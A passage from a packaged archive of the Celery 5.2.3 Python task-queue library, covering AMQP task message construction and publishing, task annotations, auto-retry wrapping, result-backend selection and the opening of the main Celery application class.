self.app._conf.bind_to(self._handle_conf_update) @cached_property def create_task_message(self): return self.task_protocols[self.app.conf.task_protocol] @cached_property def send_task_message(self): return self._create_task_sender() def Queues(self, queues, create_missing=None, autoexchange=None, max_priority=None): # Create new :class:`Queues` instance, using queue defaults # from the current configuration. conf = self.app.conf default_routing_key = conf.task_default_routing_key if create_missing is None: create_missing = conf.task_create_missing_queues if max_priority is None: max_priority = conf.task_queue_max_priority if not queues and conf.task_default_queue: queues = (Queue(conf.task_default_queue, exchange=self.default_exchange, routing_key=default_routing_key),) autoexchange = (self.autoexchange if autoexchange is None else autoexchange) return self.queues_cls( queues, self.default_exchange, create_missing, autoexchange, max_priority, default_routing_key, ) def Router(self, queues=None, create_missing=None): """Return the current task router.""" return _routes.Router(self.routes, queues or self.queues, self.app.either('task_create_missing_queues', create_missing), app=self.app) def flush_routes(self): self._rtable = _routes.prepare(self.app.conf.task_routes) def TaskConsumer(self, channel, queues=None, accept=None, **kw): if accept is None: accept = self.app.conf.accept_content return self.Consumer( channel, accept=accept, queues=queues or list(self.queues.consume_from.values()), **kw ) def as_task_v2(self, task_id, name, args=None, kwargs=None, countdown=None, eta=None, group_id=None, group_index=None, expires=None, retries=0, chord=None, callbacks=None, errbacks=None, reply_to=None, time_limit=None, soft_time_limit=None, create_sent_event=False, root_id=None, parent_id=None, shadow=None, chain=None, now=None, timezone=None, origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None): args = args or () kwargs = kwargs or {} if not isinstance(args, (list, tuple)): raise TypeError('task args must be a list or tuple') if not isinstance(kwargs, Mapping): raise TypeError('task keyword arguments must be a mapping') if countdown: # convert countdown to ETA self._verify_seconds(countdown, 'countdown') now = now or self.app.now() timezone = timezone or self.app.timezone eta = maybe_make_aware( now + timedelta(seconds=countdown), tz=timezone, ) if isinstance(expires, numbers.Real): self._verify_seconds(expires, 'expires') now = now or self.app.now() timezone = timezone or self.app.timezone expires = maybe_make_aware( now + timedelta(seconds=expires), tz=timezone, ) if not isinstance(eta, str): eta = eta and eta.isoformat() # If we retry a task `expires` will already be ISO8601-formatted. if not isinstance(expires, str): expires = expires and expires.isoformat() if argsrepr is None: argsrepr = saferepr(args, self.argsrepr_maxsize) if kwargsrepr is None: kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize) if not root_id: # empty root_id defaults to task_id root_id = task_id return task_message( headers={ 'lang': 'py', 'task': name, 'id': task_id, 'shadow': shadow, 'eta': eta, 'expires': expires, 'group': group_id, 'group_index': group_index, 'retries': retries, 'timelimit': [time_limit, soft_time_limit], 'root_id': root_id, 'parent_id': parent_id, 'argsrepr': argsrepr, 'kwargsrepr': kwargsrepr, 'origin': origin or anon_nodename(), 'ignore_result': ignore_result, }, properties={ 'correlation_id': task_id, 'reply_to': reply_to or '', }, body=( args, kwargs, { 'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain, 'chord': chord, }, ), sent_event={ 'uuid': task_id, 'root_id': root_id, 'parent_id': parent_id, 'name': name, 'args': argsrepr, 'kwargs': kwargsrepr, 'retries': retries, 'eta': eta, 'expires': expires, } if create_sent_event else None, ) def as_task_v1(self, task_id, name, args=None, kwargs=None, countdown=None, eta=None, group_id=None, group_index=None, expires=None, retries=0, chord=None, callbacks=None, errbacks=None, reply_to=None, time_limit=None, soft_time_limit=None, create_sent_event=False, root_id=None, parent_id=None, shadow=None, now=None, timezone=None, **compat_kwargs): args = args or () kwargs = kwargs or {} utc = self.utc if not isinstance(args, (list, tuple)): raise TypeError('task args must be a list or tuple') if not isinstance(kwargs, Mapping): raise TypeError('task keyword arguments must be a mapping') if countdown: # convert countdown to ETA self._verify_seconds(countdown, 'countdown') now = now or self.app.now() eta = now + timedelta(seconds=countdown) if isinstance(expires, numbers.Real): self._verify_seconds(expires, 'expires') now = now or self.app.now() expires = now + timedelta(seconds=expires) eta = eta and eta.isoformat() expires = expires and expires.isoformat() return task_message( headers={}, properties={ 'correlation_id': task_id, 'reply_to': reply_to or '', }, body={ 'task': name, 'id': task_id, 'args': args, 'kwargs': kwargs, 'group': group_id, 'group_index': group_index, 'retries': retries, 'eta': eta, 'expires': expires, 'utc': utc, 'callbacks': callbacks, 'errbacks': errbacks, 'timelimit': (time_limit, soft_time_limit), 'taskset': group_id, 'chord': chord, }, sent_event={ 'uuid': task_id, 'name': name, 'args': saferepr(args), 'kwargs': saferepr(kwargs), 'retries': retries, 'eta': eta, 'expires': expires, } if create_sent_event else None, ) def _verify_seconds(self, s, what): if s < INT_MIN: raise ValueError(f'{what} is out of range: {s!r}') return s def _create_task_sender(self): default_retry = self.app.conf.task_publish_retry default_policy = self.app.conf.task_publish_retry_policy default_delivery_mode = self.app.conf.task_default_delivery_mode default_queue = self.default_queue queues = self.queues send_before_publish = signals.before_task_publish.send before_receivers = signals.before_task_publish.receivers send_after_publish = signals.after_task_publish.send after_receivers = signals.after_task_publish.receivers send_task_sent = signals.task_sent.send # XXX compat sent_receivers = signals.task_sent.receivers default_evd = self._event_dispatcher default_exchange = self.default_exchange default_rkey = self.app.conf.task_default_routing_key default_serializer = self.app.conf.task_serializer default_compressor = self.app.conf.result_compression def send_task_message(producer, name, message, exchange=None, routing_key=None, queue=None, event_dispatcher=None, retry=None, retry_policy=None, serializer=None, delivery_mode=None, compression=None, declare=None, headers=None, exchange_type=None, **kwargs): retry = default_retry if retry is None else retry headers2, properties, body, sent_event = message if headers: headers2.update(headers) if kwargs: properties.update(kwargs) qname = queue if queue is None and exchange is None: queue = default_queue if queue is not None: if isinstance(queue, str): qname, queue = queue, queues[queue] else: qname = queue.name if delivery_mode is None: try: delivery_mode = queue.exchange.delivery_mode except AttributeError: pass delivery_mode = delivery_mode or default_delivery_mode if exchange_type is None: try: exchange_type = queue.exchange.type except AttributeError: exchange_type = 'direct' # convert to anon-exchange, when exchange not set and direct ex. if (not exchange or not routing_key) and exchange_type == 'direct': exchange, routing_key = '', qname elif exchange is None: # not topic exchange, and exchange not undefined exchange = queue.exchange.name or default_exchange routing_key = routing_key or queue.routing_key or default_rkey if declare is None and queue and not isinstance(queue, Broadcast): declare = [queue] # merge default and custom policy retry = default_retry if retry is None else retry _rp = (dict(default_policy, **retry_policy) if retry_policy else default_policy) if before_receivers: send_before_publish( sender=name, body=body, exchange=exchange, routing_key=routing_key, declare=declare, headers=headers2, properties=properties, retry_policy=retry_policy, ) ret = producer.publish( body, exchange=exchange, routing_key=routing_key, serializer=serializer or default_serializer, compression=compression or default_compressor, retry=retry, retry_policy=_rp, delivery_mode=delivery_mode, declare=declare, headers=headers2, **properties ) if after_receivers: send_after_publish(sender=name, body=body, headers=headers2, exchange=exchange, routing_key=routing_key) if sent_receivers: # XXX deprecated if isinstance(body, tuple): # protocol version 2 send_task_sent( sender=name, task_id=headers2['id'], task=name, args=body[0], kwargs=body[1], eta=headers2['eta'], taskset=headers2['group'], ) else: # protocol version 1 send_task_sent( sender=name, task_id=body['id'], task=name, args=body['args'], kwargs=body['kwargs'], eta=body['eta'], taskset=body['taskset'], ) if sent_event: evd = event_dispatcher or default_evd exname = exchange if isinstance(exname, Exchange): exname = exname.name sent_event.update({ 'queue': qname, 'exchange': exname, 'routing_key': routing_key, }) evd.publish('task-sent', sent_event, producer, retry=retry, retry_policy=retry_policy) return ret return send_task_message @cached_property def default_queue(self): return self.queues[self.app.conf.task_default_queue] @cached_property def queues(self): """Queue name⇒ declaration mapping.""" return self.Queues(self.app.conf.task_queues) @queues.setter def queues(self, queues): return self.Queues(queues) @property def routes(self): if self._rtable is None: self.flush_routes() return self._rtable @cached_property def router(self): return self.Router() @router.setter def router(self, value): return value @property def producer_pool(self): if self._producer_pool is None: self._producer_pool = pools.producers[ self.app.connection_for_write()] self._producer_pool.limit = self.app.pool.limit return self._producer_pool publisher_pool = producer_pool # compat alias @cached_property def default_exchange(self): return Exchange(self.app.conf.task_default_exchange, self.app.conf.task_default_exchange_type) @cached_property def utc(self): return self.app.conf.enable_utc @cached_property def _event_dispatcher(self): # We call Dispatcher.publish with a custom producer # so don't need the diuspatcher to be enabled. return self.app.events.Dispatcher(enabled=False) def _handle_conf_update(self, *args, **kwargs): if ('task_routes' in kwargs or 'task_routes' in args): self.flush_routes() self.router = self.Router() return ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/annotations.py0000664000175000017500000000264500000000000017656 0ustar00asifasif00000000000000"""Task Annotations. Annotations is a nice term for monkey-patching task classes in the configuration. This prepares and performs the annotations in the :setting:`task_annotations` setting. """ from celery.utils.functional import firstmethod, mlazy from celery.utils.imports import instantiate _first_match = firstmethod('annotate') _first_match_any = firstmethod('annotate_any') __all__ = ('MapAnnotation', 'prepare', 'resolve_all') class MapAnnotation(dict): """Annotation map: task_name => attributes.""" def annotate_any(self): try: return dict(self['*']) except KeyError: pass def annotate(self, task): try: return dict(self[task.name]) except KeyError: pass def prepare(annotations): """Expand the :setting:`task_annotations` setting.""" def expand_annotation(annotation): if isinstance(annotation, dict): return MapAnnotation(annotation) elif isinstance(annotation, str): return mlazy(instantiate, annotation) return annotation if annotations is None: return () elif not isinstance(annotations, (list, tuple)): annotations = (annotations,) return [expand_annotation(anno) for anno in annotations] def resolve_all(anno, task): """Resolve all pending annotations.""" return (x for x in (_first_match(anno, task), _first_match_any(anno)) if x) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/app/autoretry.py0000664000175000017500000000435700000000000017361 0ustar00asifasif00000000000000"""Tasks auto-retry functionality.""" from vine.utils import wraps from celery.exceptions import Ignore, Retry from celery.utils.time import get_exponential_backoff_interval def add_autoretry_behaviour(task, **options): """Wrap task's `run` method with auto-retry functionality.""" autoretry_for = tuple( options.get('autoretry_for', getattr(task, 'autoretry_for', ())) ) retry_kwargs = options.get( 'retry_kwargs', getattr(task, 'retry_kwargs', {}) ) retry_backoff = int( options.get('retry_backoff', getattr(task, 'retry_backoff', False)) ) retry_backoff_max = int( options.get('retry_backoff_max', getattr(task, 'retry_backoff_max', 600)) ) retry_jitter = options.get( 'retry_jitter', getattr(task, 'retry_jitter', True) ) if autoretry_for and not hasattr(task, '_orig_run'): @wraps(task.run) def run(*args, **kwargs): try: return task._orig_run(*args, **kwargs) except Ignore: # If Ignore signal occurs task shouldn't be retried, # even if it suits autoretry_for list raise except Retry: raise except autoretry_for as exc: if retry_backoff: retry_kwargs['countdown'] = \ get_exponential_backoff_interval( factor=retry_backoff, retries=task.request.retries, maximum=retry_backoff_max, full_jitter=retry_jitter) # Override max_retries if hasattr(task, 'override_max_retries'): retry_kwargs['max_retries'] = getattr(task, 'override_max_retries', task.max_retries) ret = task.retry(exc=exc, **retry_kwargs) # Stop propagation if hasattr(task, 'override_max_retries'): delattr(task, 'override_max_retries') raise ret task._orig_run, task.run = task.run, run ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/backends.py0000664000175000017500000000531500000000000017070 0ustar00asifasif00000000000000"""Backend selection.""" import sys import types from celery._state import current_app from celery.exceptions import ImproperlyConfigured, reraise from celery.utils.imports import load_extension_class_names, symbol_by_name __all__ = ('by_name', 'by_url') UNKNOWN_BACKEND = """ Unknown result backend: {0!r}. Did you spell that correctly? ({1!r}) """ BACKEND_ALIASES = { 'amqp': 'celery.backends.amqp:AMQPBackend', 'rpc': 'celery.backends.rpc.RPCBackend', 'cache': 'celery.backends.cache:CacheBackend', 'redis': 'celery.backends.redis:RedisBackend', 'rediss': 'celery.backends.redis:RedisBackend', 'sentinel': 'celery.backends.redis:SentinelBackend', 'mongodb': 'celery.backends.mongodb:MongoBackend', 'db': 'celery.backends.database:DatabaseBackend', 'database': 'celery.backends.database:DatabaseBackend', 'elasticsearch': 'celery.backends.elasticsearch:ElasticsearchBackend', 'cassandra': 'celery.backends.cassandra:CassandraBackend', 'couchbase': 'celery.backends.couchbase:CouchbaseBackend', 'couchdb': 'celery.backends.couchdb:CouchBackend', 'cosmosdbsql': 'celery.backends.cosmosdbsql:CosmosDBSQLBackend', 'riak': 'celery.backends.riak:RiakBackend', 'file': 'celery.backends.filesystem:FilesystemBackend', 'disabled': 'celery.backends.base:DisabledBackend', 'consul': 'celery.backends.consul:ConsulBackend', 'dynamodb': 'celery.backends.dynamodb:DynamoDBBackend', 'azureblockblob': 'celery.backends.azureblockblob:AzureBlockBlobBackend', 'arangodb': 'celery.backends.arangodb:ArangoDbBackend', 's3': 'celery.backends.s3:S3Backend', } def by_name(backend=None, loader=None, extension_namespace='celery.result_backends'): """Get backend class by name/alias.""" backend = backend or 'disabled' loader = loader or current_app.loader aliases = dict(BACKEND_ALIASES, **loader.override_backends) aliases.update( load_extension_class_names(extension_namespace) or {}) try: cls = symbol_by_name(backend, aliases) except ValueError as exc: reraise(ImproperlyConfigured, ImproperlyConfigured( UNKNOWN_BACKEND.strip().format(backend, exc)), sys.exc_info()[2]) if isinstance(cls, types.ModuleType): raise ImproperlyConfigured(UNKNOWN_BACKEND.strip().format( backend, 'is a Python module, not a backend class.')) return cls def by_url(backend=None, loader=None): """Get backend class by URL.""" url = None if backend and '://' in backend: url = backend scheme, _, _ = url.partition('://') if '+' in scheme: backend, url = url.split('+', 1) else: backend = scheme return by_name(backend, loader), url ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/app/base.py0000664000175000017500000013641200000000000016233 0ustar00asifasif00000000000000"""Actual App instance implementation.""" import inspect import os import sys import threading import warnings from collections import UserDict, defaultdict, deque from datetime import datetime from operator import attrgetter from click.exceptions import Exit from kombu import pools from kombu.clocks import LamportClock from kombu.common import oid_from from kombu.utils.compat import register_after_fork from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from vine import starpromise from celery import platforms, signals from celery._state import (_announce_app_finalized, _deregister_app, _register_app, _set_current_app, _task_stack, connect_on_app_finalize, get_current_app, get_current_worker_task, set_default_app) from celery.exceptions import AlwaysEagerIgnored, ImproperlyConfigured from celery.loaders import get_loader_cls from celery.local import PromiseProxy, maybe_evaluate from celery.utils import abstract from celery.utils.collections import AttributeDictMixin from celery.utils.dispatch import Signal from celery.utils.functional import first, head_from_fun, maybe_list from celery.utils.imports import gen_task_name, instantiate, symbol_by_name from celery.utils.log import get_logger from celery.utils.objects import FallbackContext, mro_lookup from celery.utils.time import maybe_make_aware, timezone, to_utc # Load all builtin tasks from . import builtins # noqa from . import backends from .annotations import prepare as prepare_annotations from .autoretry import add_autoretry_behaviour from .defaults import DEFAULT_SECURITY_DIGEST, find_deprecated_settings from .registry import TaskRegistry from .utils import (AppPickler, Settings, _new_key_to_old, _old_key_to_new, _unpickle_app, _unpickle_app_v2, appstr, bugreport, detect_settings) __all__ = ('Celery',) logger = get_logger(__name__) BUILTIN_FIXUPS = { 'celery.fixups.django:fixup', } USING_EXECV = os.environ.get('FORKED_BY_MULTIPROCESSING') ERR_ENVVAR_NOT_SET = """ The environment variable {0!r} is not set, and as such the configuration could not be loaded. Please set this variable and make sure it points to a valid configuration module. Example: {0}="proj.celeryconfig" """ def app_has_custom(app, attr): """Return true if app has customized method `attr`. Note: This is used for optimizations in cases where we know how the default behavior works, but need to account for someone using inheritance to override a method/property. """ return mro_lookup(app.__class__, attr, stop={Celery, object}, monkey_patched=[__name__]) def _unpickle_appattr(reverse_name, args): """Unpickle app.""" # Given an attribute name and a list of args, gets # the attribute from the current app and calls it. return get_current_app()._rgetattr(reverse_name)(*args) def _after_fork_cleanup_app(app): # This is used with multiprocessing.register_after_fork, # so need to be at module level. try: app._after_fork() except Exception as exc: # pylint: disable=broad-except logger.info('after forker raised exception: %r', exc, exc_info=1) class PendingConfiguration(UserDict, AttributeDictMixin): # `app.conf` will be of this type before being explicitly configured, # meaning the app can keep any configuration set directly # on `app.conf` before the `app.config_from_object` call. # # accessing any key will finalize the configuration, # replacing `app.conf` with a concrete settings object. callback = None _data = None def __init__(self, conf, callback): object.__setattr__(self, '_data', conf) object.__setattr__(self, 'callback', callback) def __setitem__(self, key, value): self._data[key] = value def clear(self): self._data.clear() def update(self, *args, **kwargs): self._data.update(*args, **kwargs) def setdefault(self, *args, **kwargs): return self._data.setdefault(*args, **kwargs) def __contains__(self, key): # XXX will not show finalized configuration # setdefault will cause `key in d` to happen, # so for setdefault to be lazy, so does contains. return key in self._data def __len__(self): return len(self.data) def __repr__(self): return repr(self.data) @cached_property def data(self): return self.callback() class Celery: """Celery application. Arguments: main (str): Name of the main module if running as `__main__`. This is used as the prefix for auto-generated task names. Keyword Arguments: broker (str): URL of the default broker used. backend (Union[str, Type[celery.backends.base.Backend]]): The result store backend class, or the name of the backend class to use. Default is the value of the :setting:`result_backend` setting. autofinalize (bool): If set to False a :exc:`RuntimeError` will be raised if the task registry or tasks are used before the app is finalized. set_as_current (bool): Make this the global current app. include (List[str]): List of modules every worker should import. amqp (Union[str, Type[AMQP]]): AMQP object or class name. events (Union[str, Type[celery.app.events.Events]]): Events object or class name. log (Union[str, Type[Logging]]): Log object or class name. control (Union[str, Type[celery.app.control.Control]]): Control object or class name. tasks (Union[str, Type[TaskRegistry]]): A task registry, or the name of a registry class. fixups (List[str]): List of fix-up plug-ins (e.g., see :mod:`celery.fixups.django`). config_source (Union[str, class]): Take configuration from a class, or object. Attributes may include any settings described in the documentation. task_cls (Union[str, Type[celery.app.task.Task]]): base task class to use. See :ref:`this section ` for usage. """ #: This is deprecated, use :meth:`reduce_keys` instead Pickler = AppPickler SYSTEM = platforms.SYSTEM IS_macOS, IS_WINDOWS = platforms.IS_macOS, platforms.IS_WINDOWS #: Name of the `__main__` module. Required for standalone scripts. #: #: If set this will be used instead of `__main__` when automatically #: generating task names. main = None #: Custom options for command-line programs. #: See :ref:`extending-commandoptions` user_options = None #: Custom bootsteps to extend and modify the worker. #: See :ref:`extending-bootsteps`. steps = None builtin_fixups = BUILTIN_FIXUPS amqp_cls = 'celery.app.amqp:AMQP' backend_cls = None events_cls = 'celery.app.events:Events' loader_cls = None log_cls = 'celery.app.log:Logging' control_cls = 'celery.app.control:Control' task_cls = 'celery.app.task:Task' registry_cls = 'celery.app.registry:TaskRegistry' #: Thread local storage. _local = None _fixups = None _pool = None _conf = None _after_fork_registered = False #: Signal sent when app is loading configuration. on_configure = None #: Signal sent after app has prepared the configuration. on_after_configure = None #: Signal sent after app has been finalized. on_after_finalize = None #: Signal sent by every new process after fork. on_after_fork = None def __init__(self, main=None, loader=None, backend=None, amqp=None, events=None, log=None, control=None, set_as_current=True, tasks=None, broker=None, include=None, changes=None, config_source=None, fixups=None, task_cls=None, autofinalize=True, namespace=None, strict_typing=True, **kwargs): self._local = threading.local() self.clock = LamportClock() self.main = main self.amqp_cls = amqp or self.amqp_cls self.events_cls = events or self.events_cls self.loader_cls = loader or self._get_default_loader() self.log_cls = log or self.log_cls self.control_cls = control or self.control_cls self.task_cls = task_cls or self.task_cls self.set_as_current = set_as_current self.registry_cls = symbol_by_name(self.registry_cls) self.user_options = defaultdict(set) self.steps = defaultdict(set) self.autofinalize = autofinalize self.namespace = namespace self.strict_typing = strict_typing self.configured = False self._config_source = config_source self._pending_defaults = deque() self._pending_periodic_tasks = deque() self.finalized = False self._finalize_mutex = threading.Lock() self._pending = deque() self._tasks = tasks if not isinstance(self._tasks, TaskRegistry): self._tasks = self.registry_cls(self._tasks or {}) # If the class defines a custom __reduce_args__ we need to use # the old way of pickling apps: pickling a list of # args instead of the new way that pickles a dict of keywords. self._using_v1_reduce = app_has_custom(self, '__reduce_args__') # these options are moved to the config to # simplify pickling of the app object. self._preconf = changes or {} self._preconf_set_by_auto = set() self.__autoset('broker_url', broker) self.__autoset('result_backend', backend) self.__autoset('include', include) for key, value in kwargs.items(): self.__autoset(key, value) self._conf = Settings( PendingConfiguration( self._preconf, self._finalize_pending_conf), prefix=self.namespace, keys=(_old_key_to_new, _new_key_to_old), ) # - Apply fix-ups. self.fixups = set(self.builtin_fixups) if fixups is None else fixups # ...store fixup instances in _fixups to keep weakrefs alive. self._fixups = [symbol_by_name(fixup)(self) for fixup in self.fixups] if self.set_as_current: self.set_current() # Signals if self.on_configure is None: # used to be a method pre 4.0 self.on_configure = Signal(name='app.on_configure') self.on_after_configure = Signal( name='app.on_after_configure', providing_args={'source'}, ) self.on_after_finalize = Signal(name='app.on_after_finalize') self.on_after_fork = Signal(name='app.on_after_fork') # Boolean signalling, whether fast_trace_task are enabled. # this attribute is set in celery.worker.trace and checked by celery.worker.request self.use_fast_trace_task = False self.on_init() _register_app(self) def _get_default_loader(self): # the --loader command-line argument sets the environment variable. return ( os.environ.get('CELERY_LOADER') or self.loader_cls or 'celery.loaders.app:AppLoader' ) def on_init(self): """Optional callback called at init.""" def __autoset(self, key, value): if value is not None: self._preconf[key] = value self._preconf_set_by_auto.add(key) def set_current(self): """Make this the current app for this thread.""" _set_current_app(self) def set_default(self): """Make this the default app for all threads.""" set_default_app(self) def _ensure_after_fork(self): if not self._after_fork_registered: self._after_fork_registered = True if register_after_fork is not None: register_after_fork(self, _after_fork_cleanup_app) def close(self): """Clean up after the application. Only necessary for dynamically created apps, and you should probably use the :keyword:`with` statement instead. Example: >>> with Celery(set_as_current=False) as app: ... with app.connection_for_write() as conn: ... pass """ self._pool = None _deregister_app(self) def start(self, argv=None): """Run :program:`celery` using `argv`. Uses :data:`sys.argv` if `argv` is not specified. """ from celery.bin.celery import celery celery.params[0].default = self if argv is None: argv = sys.argv try: celery.main(args=argv, standalone_mode=False) except Exit as e: return e.exit_code finally: celery.params[0].default = None def worker_main(self, argv=None): """Run :program:`celery worker` using `argv`. Uses :data:`sys.argv` if `argv` is not specified. """ if argv is None: argv = sys.argv if 'worker' not in argv: raise ValueError( "The worker sub-command must be specified in argv.\n" "Use app.start() to programmatically start other commands." ) self.start(argv=argv) def task(self, *args, **opts): """Decorator to create a task class out of any callable. See :ref:`Task options` for a list of the arguments that can be passed to this decorator. Examples: .. code-block:: python @app.task def refresh_feed(url): store_feed(feedparser.parse(url)) with setting extra options: .. code-block:: python @app.task(exchange='feeds') def refresh_feed(url): return store_feed(feedparser.parse(url)) Note: App Binding: For custom apps the task decorator will return a proxy object, so that the act of creating the task is not performed until the task is used or the task registry is accessed. If you're depending on binding to be deferred, then you must not access any attributes on the returned object until the application is fully set up (finalized). """ if USING_EXECV and opts.get('lazy', True): # When using execv the task in the original module will point to a # different app, so doing things like 'add.request' will point to # a different task instance. This makes sure it will always use # the task instance from the current app. # Really need a better solution for this :( from . import shared_task return shared_task(*args, lazy=False, **opts) def inner_create_task_cls(shared=True, filter=None, lazy=True, **opts): _filt = filter def _create_task_cls(fun): if shared: def cons(app): return app._task_from_fun(fun, **opts) cons.__name__ = fun.__name__ connect_on_app_finalize(cons) if not lazy or self.finalized: ret = self._task_from_fun(fun, **opts) else: # return a proxy object that evaluates on first use ret = PromiseProxy(self._task_from_fun, (fun,), opts, __doc__=fun.__doc__) self._pending.append(ret) if _filt: return _filt(ret) return ret return _create_task_cls if len(args) == 1: if callable(args[0]): return inner_create_task_cls(**opts)(*args) raise TypeError('argument 1 to @task() must be a callable') if args: raise TypeError( '@task() takes exactly 1 argument ({} given)'.format( sum([len(args), len(opts)]))) return inner_create_task_cls(**opts) def _task_from_fun(self, fun, name=None, base=None, bind=False, **options): if not self.finalized and not self.autofinalize: raise RuntimeError('Contract breach: app not finalized') name = name or self.gen_task_name(fun.__name__, fun.__module__) base = base or self.Task if name not in self._tasks: run = fun if bind else staticmethod(fun) task = type(fun.__name__, (base,), dict({ 'app': self, 'name': name, 'run': run, '_decorated': True, '__doc__': fun.__doc__, '__module__': fun.__module__, '__annotations__': fun.__annotations__, '__header__': staticmethod(head_from_fun(fun, bound=bind)), '__wrapped__': run}, **options))() # for some reason __qualname__ cannot be set in type() # so we have to set it here. try: task.__qualname__ = fun.__qualname__ except AttributeError: pass self._tasks[task.name] = task task.bind(self) # connects task to this app add_autoretry_behaviour(task, **options) else: task = self._tasks[name] return task def register_task(self, task, **options): """Utility for registering a task-based class. Note: This is here for compatibility with old Celery 1.0 style task classes, you should not need to use this for new projects. """ task = inspect.isclass(task) and task() or task if not task.name: task_cls = type(task) task.name = self.gen_task_name( task_cls.__name__, task_cls.__module__) add_autoretry_behaviour(task, **options) self.tasks[task.name] = task task._app = self task.bind(self) return task def gen_task_name(self, name, module): return gen_task_name(self, name, module) def finalize(self, auto=False): """Finalize the app. This loads built-in tasks, evaluates pending task decorators, reads configuration, etc. """ with self._finalize_mutex: if not self.finalized: if auto and not self.autofinalize: raise RuntimeError('Contract breach: app not finalized') self.finalized = True _announce_app_finalized(self) pending = self._pending while pending: maybe_evaluate(pending.popleft()) for task in self._tasks.values(): task.bind(self) self.on_after_finalize.send(sender=self) def add_defaults(self, fun): """Add default configuration from dict ``d``. If the argument is a callable function then it will be regarded as a promise, and it won't be loaded until the configuration is actually needed. This method can be compared to: .. code-block:: pycon >>> celery.conf.update(d) with a difference that 1) no copy will be made and 2) the dict will not be transferred when the worker spawns child processes, so it's important that the same configuration happens at import time when pickle restores the object on the other side. """ if not callable(fun): d, fun = fun, lambda: d if self.configured: return self._conf.add_defaults(fun()) self._pending_defaults.append(fun) def config_from_object(self, obj, silent=False, force=False, namespace=None): """Read configuration from object. Object is either an actual object or the name of a module to import. Example: >>> celery.config_from_object('myapp.celeryconfig') >>> from myapp import celeryconfig >>> celery.config_from_object(celeryconfig) Arguments: silent (bool): If true then import errors will be ignored. force (bool): Force reading configuration immediately. By default the configuration will be read only when required. """ self._config_source = obj self.namespace = namespace or self.namespace if force or self.configured: self._conf = None if self.loader.config_from_object(obj, silent=silent): return self.conf def config_from_envvar(self, variable_name, silent=False, force=False): """Read configuration from environment variable. The value of the environment variable must be the name of a module to import. Example: >>> os.environ['CELERY_CONFIG_MODULE'] = 'myapp.celeryconfig' >>> celery.config_from_envvar('CELERY_CONFIG_MODULE') """ module_name = os.environ.get(variable_name) if not module_name: if silent: return False raise ImproperlyConfigured( ERR_ENVVAR_NOT_SET.strip().format(variable_name)) return self.config_from_object(module_name, silent=silent, force=force) def config_from_cmdline(self, argv, namespace='celery'): self._conf.update( self.loader.cmdline_config_parser(argv, namespace) ) def setup_security(self, allowed_serializers=None, key=None, cert=None, store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): """Setup the message-signing serializer. This will affect all application instances (a global operation). Disables untrusted serializers and if configured to use the ``auth`` serializer will register the ``auth`` serializer with the provided settings into the Kombu serializer registry. Arguments: allowed_serializers (Set[str]): List of serializer names, or content_types that should be exempt from being disabled. key (str): Name of private key file to use. Defaults to the :setting:`security_key` setting. cert (str): Name of certificate file to use. Defaults to the :setting:`security_certificate` setting. store (str): Directory containing certificates. Defaults to the :setting:`security_cert_store` setting. digest (str): Digest algorithm used when signing messages. Default is ``sha256``. serializer (str): Serializer used to encode messages after they've been signed. See :setting:`task_serializer` for the serializers supported. Default is ``json``. """ from celery.security import setup_security return setup_security(allowed_serializers, key, cert, store, digest, serializer, app=self) def autodiscover_tasks(self, packages=None, related_name='tasks', force=False): """Auto-discover task modules. Searches a list of packages for a "tasks.py" module (or use related_name argument). If the name is empty, this will be delegated to fix-ups (e.g., Django). For example if you have a directory layout like this: .. code-block:: text foo/__init__.py tasks.py models.py bar/__init__.py tasks.py models.py baz/__init__.py models.py Then calling ``app.autodiscover_tasks(['foo', 'bar', 'baz'])`` will result in the modules ``foo.tasks`` and ``bar.tasks`` being imported. Arguments: packages (List[str]): List of packages to search. This argument may also be a callable, in which case the value returned is used (for lazy evaluation). related_name (Optional[str]): The name of the module to find. Defaults to "tasks": meaning "look for 'module.tasks' for every module in ``packages``.". If ``None`` will only try to import the package, i.e. "look for 'module'". force (bool): By default this call is lazy so that the actual auto-discovery won't happen until an application imports the default modules. Forcing will cause the auto-discovery to happen immediately. """ if force: return self._autodiscover_tasks(packages, related_name) signals.import_modules.connect(starpromise( self._autodiscover_tasks, packages, related_name, ), weak=False, sender=self) def _autodiscover_tasks(self, packages, related_name, **kwargs): if packages: return self._autodiscover_tasks_from_names(packages, related_name) return self._autodiscover_tasks_from_fixups(related_name) def _autodiscover_tasks_from_names(self, packages, related_name): # packages argument can be lazy return self.loader.autodiscover_tasks( packages() if callable(packages) else packages, related_name, ) def _autodiscover_tasks_from_fixups(self, related_name): return self._autodiscover_tasks_from_names([ pkg for fixup in self._fixups if hasattr(fixup, 'autodiscover_tasks') for pkg in fixup.autodiscover_tasks() ], related_name=related_name) def send_task(self, name, args=None, kwargs=None, countdown=None, eta=None, task_id=None, producer=None, connection=None, router=None, result_cls=None, expires=None, publisher=None, link=None, link_error=None, add_to_parent=True, group_id=None, group_index=None, retries=0, chord=None, reply_to=None, time_limit=None, soft_time_limit=None, root_id=None, parent_id=None, route_name=None, shadow=None, chain=None, task_type=None, **options): """Send task by name. Supports the same arguments as :meth:`@-Task.apply_async`. Arguments: name (str): Name of task to call (e.g., `"tasks.add"`). result_cls (AsyncResult): Specify custom result class. """ parent = have_parent = None amqp = self.amqp task_id = task_id or uuid() producer = producer or publisher # XXX compat router = router or amqp.router conf = self.conf if conf.task_always_eager: # pragma: no cover warnings.warn(AlwaysEagerIgnored( 'task_always_eager has no effect on send_task', ), stacklevel=2) ignore_result = options.pop('ignore_result', False) options = router.route( options, route_name or name, args, kwargs, task_type) if expires is not None: if isinstance(expires, datetime): expires_s = (maybe_make_aware(expires) - self.now()).total_seconds() else: expires_s = expires if expires_s < 0: logger.warning( f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n" "We assume this is intended and so we have set the " "expiration date to 0 instead.\n" "According to RabbitMQ's documentation:\n" "\"Setting the TTL to 0 causes messages to be expired upon " "reaching a queue 